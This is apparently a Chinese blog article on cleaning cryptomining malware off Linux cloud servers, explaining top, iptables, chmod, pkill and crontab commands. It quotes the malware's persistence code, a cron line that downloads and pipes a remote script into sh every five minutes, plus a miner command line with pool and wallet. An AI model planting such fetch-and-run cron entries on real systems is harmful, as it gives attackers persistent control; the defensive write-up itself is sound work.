|
最近受类似于比特币及区块链技术的影响,有些云服务器被攻入,植入挖矿病毒,利用你的云服务器来挖矿。本文就阐述几个常用的linux命令,假如你碰到这样的病毒,这些linux命令可能会有些帮助。这些命令并不完全是删除挖矿病毒的一种方面,它们更多的是一种通用的解决问题的方法,不单单局限于挖矿病毒。
解决方法 本文以这个挖矿进程来举例 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofT 命令 top c(查看cpu,依照病毒进程占高CPU的特点找到病毒程序) iptables -A INPUT -s xmr.crypto-pool.fr -j DROP iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP(关闭对挖矿服务器的进出口访问) chmod -x minerd (改变挖矿程序的执行权限) pkill minerd (杀死进程) service stop crond 或者 crontab -r (删除所有的执行计划) (以上内容可以说是通用的,想把某个CPU占用很高的进程禁止了,都能用,下面的内容可能是个性化的,仅针对于某个挖矿病毒) 因为病毒有这样的代码 export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/5 * * * * curl -fsSL http://www.***.com/pm.sh?0105008 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://www.***.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root 所以 检查/var/spool/cron/目录下发现有个root用户的定时器文件 其命令为 cd /var/ spool/cron/ 删除下载病毒的脚本文件 删除的命令为 rm 文件 挖矿病毒主要是利用了redis的一些漏洞获得服务器的访问权限,然后植入病毒,即使更新漏洞,另外,可以 vim ~/.ssh/authorized_keys 删除不认识的账号,可以查看自己的用户列表,删除不认识的用户。 如果读者只是为了解决问题,读到这里就可以了,下面内容给出各个命令的详细解释,各个参数的意义等,以便学习方法,解决更多类似的问题。
命令解析 命令1 top c(作用,查看CPU,可以看一些进程占用的CPU,如果某个进程几乎占用了所有的CPU,那么这个进程可能就是病毒) 比如输入这个命令以后,假如服务器中了挖矿病毒,就可以看到和上述例子差不多的内容。 top命令可以实时动态地查看系统的整体运行情况,是一个综合了多方信息监测系统性能和运行信息的实用工具。通过top命令所提供的互动式界面,用热键可以管理。
Top – 系统时间 up 系统已经运行的时间(天) 1 user:1个用户当前登录 load average:系统负载,即任务队列的平均长度 tasks 总进程数 2 running 正在运行的进程数 86 sleeping 睡眠的进程数 0 stopped 停止的进程数 0 zombie 冻结的进程数 %cpu cpu利用率 其中 us(用户空间占比)sy(内核空间占比)ni(用户进程空间内改变过优先级的进程占比)id(空闲占比)wa(等待输入输出CPU占比) 后面两行是内存和交换区的一些数据。
命令2 iptables 的相关命令(作用,关闭对挖矿服务器的访问) iptables -A INPUT -s xmr.crypto-pool.fr -j DROP iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP 解释一下这个命令,iptables是防火墙相关的命令,参数A是添加的意思,两句话的作用是添加防火墙规则,分别是入方向的和出方向的 -s -d 分别指的是源和目的中间的是挖矿服务器的地址 -j ACTION :指定如何进行处理这里的ACTION是DROP,关闭。
命令3 chmod (改变执行权限) chmod -x minerd 参数x的作用是执行或切换权限。 这个命令的作用是 取消minerd的执行权限。
命令4 pkill (杀掉进程) pkill minerd Pkill就是杀掉进程的命令,这个命令很简单,不用更多的解释了。
命令5 service stop crond 或者 crontab -r (删除所有的执行计划) crond是一个daemon,它每分钟wake up一次,按照crontab里定义的形式来执行任务。 crontab是一个表的概念,用于告诉crond以何种形式执行。
总结 本文介绍了某个挖矿病毒的清除方式,并详细解释了一些linux命令,更多的想介绍这些命令,讲一个通用的方法。病毒是不断变化的,您看到这篇文章的时候,可能这个病毒已经成为过去式了,但是这些linux命令是不变的,掌握这些命令的知识,可以先进行一个简单的处理,然后再根据病毒的个性,进行进一步的处理。
相关主题 |
